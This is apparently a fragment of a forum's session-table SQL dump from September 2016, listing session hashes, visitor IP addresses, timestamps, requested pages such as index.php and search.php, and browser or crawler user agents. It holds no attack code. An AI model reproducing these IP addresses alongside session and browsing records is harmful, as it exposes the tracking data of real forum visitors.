('846e803c4b65e11d0816027bf7e550c8', 0, '197.0.87.232', 'e1800af8db7f02112e2b7c5f54ab6a50', 1473257020, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be8e739400991bee14f8f2ca867f9ca4', 0, '104.243.244.18', '86e1f9e56fb8beb13b6664e51a5a6078', 1473270317, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d901e7333e79a6efe202cbbf61277d7', 0, '172.68.11.244', '3c367e5595d1a4fd1270f58e564b1a64', 1473272038, '/showthread.php?mode=hybrid&t=2469', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/50.14.22.468 Chrom', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('33016f623873c5525c447718ae2ab597', 0, '197.211.57.48', '43f1bee54dbe662b6dd409928a0d0c20', 1473278381, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e33f5675c829edf7dc9c57d9a9733dad', 278, '200.117.106.140', 'e227a28928786fb6a589baf32c06f341', 1473285762, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('9bf3eca6ca85657a528aebe34a9cdf66', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473294276, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f67c42eeb7b2d97715e2fd4cc8bc5aad', 0, '73.104.22.181', 'c841b90fbd9e3bb61dd8a200dc395d30', 1473296554, '/forumdisplay.php?f=37', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6c0cdfbe4305eecb243905962c168efe', 0, '163.172.64.223', '6237e1041a2c2105e46b19b0de071880', 1473304709, '/showthread.php?t=2480', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7a82fadc95b2982e42d1c0f4197f625', 0, '172.68.58.71', 'a938925ca9403f145c82d10ebc1ecbe1', 1473310173, '/misc.php?do=showsmilies&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('5213fae3d5d49ecb176c785b75ab9f42', 0, '195.22.127.184', '1ac830305965ceb79e00dc221ea3bf98', 1473313267, '/index.php?langid=2', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c98bdfccce74ffae852f745288252e60', 0, '192.3.245.242', 'fac238692ea7c675db0bd65b494b26a6', 1473313273, '/login.php?do=login&do=login', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bad6e8bfc7063836fbc9f772c673f599', 0, '172.68.58.80', 'a938925ca9403f145c82d10ebc1ecbe1', 1473313653, '/tags.php?tag=exploit-kit', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27eeb2c09df2fac3d706d1baa93be1da', 0, '172.68.58.137', 'a938925ca9403f145c82d10ebc1ecbe1', 1473313843, '/search.php?searchthreadid=2333', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('476ebb19fecd2a21c94733150c910929', 0, '172.68.59.82', 'a938925ca9403f145c82d10ebc1ecbe1', 1473322374, '/archive/index.php/t-1175.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('f16c27ddc2ea0707f26997a0e75b9d88', 161, '172.68.29.181', 'd8752cf67051540a22ada9c27a70dc20', 1473327317, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('7831b6f36e08d9b4e11b978e8358e243', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473337092, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5fc4f920c7de4383be1c1c073e661757', 0, '46.165.240.174', '5d7e9f2c52398845120cbe81c3efe9fe', 1473343480, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5b9ae3bdf40e6852340a5633841c95f5', 0, '172.68.59.74', 'a938925ca9403f145c82d10ebc1ecbe1', 1473349692, '/member.php?u=162&langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13fb2aa1a786bbf58e46db0199dee2d4', 0, '88.198.41.86', '81384ac2c0405142ffd158efab8d0fb2', 1473349864, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f3c3c3d6cd6b34e52682b89b1c80770d', 0, '107.172.218.178', '0a6e4952862d9d66fc7e72a59de80897', 1473350272, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1b403a569c710d355cacfc170212bb7', 0, '207.46.13.28', '5e207e311e22cdc3b2095126a922fa93', 1473499622, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7876d21743188dfaade65aa0fd3c9a0e', 0, '207.46.13.111', '5e207e311e22cdc3b2095126a922fa93', 1473357313, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27b75dcdf30cf47ef114c57db4bf89af', 0, '24.176.84.201', '9fe91c3a253551a0035b31afda873d4e', 1473370762, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('54c7fe4757819f73fb1eb35ddd88521f', 0, '5.254.97.104', 'e86419a9f8da108905fcd02e8f7de6df', 1473371292, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b403f9d8555a95748a85bf6d82462184', 0, '172.68.58.104', 'a938925ca9403f145c82d10ebc1ecbe1', 1473379712, '/archive/index.php/t-2477.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('4423d8e73f77abdbaf535cb20f04eb6d', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473379750, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('db9225a50c422ddab984b721be59f003', 0, '74.111.183.69', '0c18d718e6182468d9e13ba47e459062', 1473380545, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('37f66a0de70ba21182f5f98df99bee39', 0, '37.187.129.166', '642d8b2f144306e82b4c93d2bc08298d', 1473526582, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c94268ad1d87cf5b4c93c6e77724d4e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473422995, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('98226095ad9f45d88c432601230408b5', 0, '78.247.45.105', '731761a35d2e21e830293ec4c116d531', 1473427481, '/index.php', 'Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-A500FU Build/LRX22G) AppleWebKit/537.36 (KHTML, like G', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7a38bfba59a670f408a12e553ebc57c2', 0, '172.68.11.243', 'c3beeafd44ca3225ef9d3bb6a1d6e278', 1473434513, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('060acbc021228c997f18a9ec9ac91e82', 0, '174.100.69.155', 'e049baf43db54a9488d33665d3587130', 1473436123, '/index.php', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4c6012e2cfae893513ca840f821359c1', 0, '90.19.190.84', '02153d4892ce966aed274f0b648d11d7', 1473446267, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5057843570267f3dcc11ef218b7c6af3', 0, '90.19.190.84', 'aa7adcc5662813180f8b2225f232c91f', 1473446274, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('04417b965446604eb4542605e611095d', 0, '23.94.163.76', '8109bccfce6eb95b2b9b882159098939', 1473453463, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('204c69c995fda6db576b4f93fbbbb1e3', 0, '173.44.59.188', 'bcd919b932d37821659e49916623f9ee', 1473454599, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4e26ce945011a4bbe7b5957506a7c49', 0, '23.108.97.54', 'e3e8ae4b7006f0e8231b15c31b3df24a', 1473455139, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1fbf76ec554129a90d59557ae66690ef', 0, '23.106.70.145', '1a7793649af3f985200df324525c6bc2', 1473455552, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f4512c4446c2a528b2e381369614d8b0', 0, '198.23.168.99', 'c7a40361e6d4da535dd6d68e1e88028d', 1473456453, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b8aaa7e7f5338d57c864021bb5e77f65', 0, '204.44.127.48', 'f4ca253b9923a1a4154dd08e67e82168', 1473460056, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('abd0a8ac9966195f6e8d0dc243946131', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473465748, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('45d8f4e69c0e32b3d6422263cbfea0ac', 0, '198.23.169.82', '162b44455a2a99e29dc60e7b2238b0f5', 1473488857, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52c5ed4857e435e917d54638790b096f', 0, '179.43.177.194', 'd2fcb0fa2afa1e799118942d35815504', 1473492281, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('141e6174bc2e61ef0baf77d0264f660a', 0, '172.68.2.23', 'cacddf58744e5d4e34140054560cdce1', 1473505076, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('854b6bc0f3f5228822fa4ced4472ec18', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473508995, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('997c8bebdd59f2b708a95a38f5a90681', 0, '172.68.11.246', '798cfeb352a776776b92019daf80ca84', 1473521799, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 YaB', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bdddb84596be683675c8179bb0cc7d68', 0, '172.68.11.239', 'df4eec3b1212b917cb5b4ad427d02c1f', 1473523075, '/showthread.php?mode=hybrid&t=2469', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1006360fb83f9699ace92f7b238a0d28', 0, '172.68.11.197', '742a6451898a10b76ade5ec874d1a5f6', 1473545600, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('960e2f8cf8cb664862ccf8c068c1d465', 0, '23.80.138.161', 'b4ee1998f264231da6a2ce443ccec274', 1473546460, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c955ddfb944fb66fbee6d1213c0e6208', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473551734, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c848d37ea70ed5e827d9de65597f30d0', 0, '124.158.7.250', '1f1ff911a748d4e8def01470174d9aad', 1474836497, '/index.php', 'python-requests/2.11.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de43187908aef68faad37a055c57f413', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473594646, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('46f4b9e76b4e8b84991b63a728148e17', 0, '5.79.80.100', 'cbd0784b00a6acd57912229ede9a8338', 1473596142, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1a937ef610f062094abc22990800c3b', 0, '2003:80:8e64:46', '8cdc6d18ea66596b052bc149dfa01400', 1473602894, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('849e57c3f785c6aa1fc8b0b23f9f12fc', 0, '31.169.51.195', '6dced9f0b04a3b843ee54e12778c20e0', 1473610626, '/showthread.php?p=3045', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e0a218f0628a07133b43a971cda0de0e', 0, '172.68.58.126', '448650e2a2958d6f62f2cade162cfa26', 1473611262, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('506fbffa7d240c57b4d5f86d712520ee', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473637544, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4119bca22da9e7d7bd27775e3716af40', 0, '203.250.148.38', 'e70aa3e1e78912afdd0fa6c1664b116d', 1473674045, '/showthread.php?t=1850', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e87efa6c01c72e447d0dc6b9126ebe76', 0, '41.68.255.231', '055c078542e9e277855f593794077f84', 1473674609, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b74e0828a5990c7d13287f89fb70312e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473680332, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('586a432415f3ab5dd490934e724e3a9c', 0, '207.46.13.174', '5e207e311e22cdc3b2095126a922fa93', 1473692776, '/misc.php?do=showrules', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3a73e30b42e634766d78255812c7d988', 0, '157.55.39.125', '23f3103f44bc3badcba53554e5e4cb6d', 1473694626, '/search.php?searchthreadid=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dfe1dca8a9856552f09bb3c695979461', 0, '172.68.58.120', '7bd06f1af42ea2d784e2d9a098d303cf', 1473697664, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fe97877d22cc2fcae6778a818e52cca9', 0, '192.3.59.37', '7ececbd42482a7f8dfc695fb9e4cc6b3', 1473700231, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('47c4854a29e61e4e3c2f73e2854f8c16', 0, '109.163.234.9', 'd2fefe8f7ca72219c5e8aa346db69ede', 1473701672, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('397af9b11269bcda5884b8a1065e2357', 0, '172.68.54.47', '8a6e72b0d1a7cfac12ebe28c916a0911', 1473705072, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('912f41edc6f1a86ab38c21620a190d25', 0, '173.44.52.85', '410c90a371dbe765deaee0da49303ef5', 1473705359, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('84bfdea1fcfe1a5620da76843ad49bb1', 0, '68.180.228.153', '9d8a8ad3406087c14548478984f3ed76', 1474195262, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('36caf1c22be0daa0ee607a5b0d8bbe60', 0, '142.169.78.115', '69fc7e403daffc61b77781e2aa2b3044', 1473711532, '/faq.php', 'Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd5902ad6fcd78e8d68ea54bdd5308cd', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473723005, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('baf0b18edf8ba959521a871ed7d453f7', 0, '23.80.167.108', '536bea332b6503534053ca20f4149b69', 1473732554, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bfb6d46d7ad4b8fa9b784a39c9d2f592', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473765681, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b2dba02a49aab01ec197b1e9bcd7f6a5', 0, '209.95.50.102', 'cf03761819279936997929320c85c15d', 1473766264, '/showthread.php?p=2936', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8706c7c91f6ca10ebea8d0c87f559365', 0, '46.98.133.11', '287f3cacab33507cc26c4c983fb12b2e', 1473767783, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('286284f710abc30825eba604e92c465c', 0, '207.46.13.64', '5e207e311e22cdc3b2095126a922fa93', 1474951964, '/archive/index.php?pda=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5ac8cd91a57e6d3cf18a7a69ed55eaa2', 0, '159.253.145.183', '787f25a8222bde8f8b5562fd380050ac', 1473770231, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b641be0fd3e7a12b7d8bb115b898ad4', 0, '109.67.107.158', '2e5cd6602f16a9480aadc8d4fb5870bd', 1473784483, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5f3210c8c850a6324fc18d944f91ae0', 0, '104.168.43.93', 'daacff08ee9c07aaca1160477d0d8399', 1473800128, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a9ac9d321de12e7477eddb254ed657ed', 0, '23.105.150.97', 'ecf7c8d644f0abe746a1646b7b61feea', 1473800734, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cdc83bc2b0d08625955f066e2d4b037b', 0, '23.106.82.82', 'c379617759585d7bbaa8449ef6427af7', 1473801222, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('988fe1acd7f33137d462fb739ed0da29', 0, '45.40.34.43', 'e06d1db4c1e6da27e2038bafcec2f3d2', 1473802125, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6c637afc8f6c6394a4d5cef78a187cd', 0, '198.199.125.40', '59f2a863c07b00fbf8d7169fa0296e52', 1473802938, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('56c1a1cd75807b530109fea13ad0bc1a', 0, '23.94.161.69', 'da1c7d907b01700b502e910ef113fa6e', 1473805727, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('84d16227249eab7d1c6e2708f30841ce', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473808763, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b4e3c2c087fabd31b26706c295aee8f4', 0, '5.135.167.84', '658c41e6ae692214ad5a90ecf058010c', 1473812810, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('78a0dc162656923300bc9c730eae9aa7', 0, '192.3.59.211', '53ea53b4c6d245af595cd2d37f9c6a7a', 1473819077, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('62f1b5d549e5c0ca6cb6358e138870c8', 0, '23.104.156.27', '08d6c6c0ee3f3426cda3180d6b699466', 1473834529, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4cfa671a5319502cbbcf722513766e24', 0, '41.66.253.204', '58da58e9ab6495885ccf0dcd2363dacf', 1473850954, '/showthread.php?p=2936', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ef0ec88bf84c23ea7d01db79527e5e3', 0, '141.19.230.37', 'bbcea3d35c9f5012ce4d87a5c8471f6a', 1473851878, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f98816da88f117aeca3405241449c5fc', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473852355, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('88144c9e96147bd93089a59541408610', 0, '172.68.11.204', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475337372, '/showthread.php?t=2392', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('74141c3c71abd3cf10c1ad32bc13c082', 0, '207.46.13.91', '5e207e311e22cdc3b2095126a922fa93', 1473919165, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9e85c88a92cdb3c4c16d1ee5659dacba', 0, '157.55.39.183', '23f3103f44bc3badcba53554e5e4cb6d', 1473915937, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
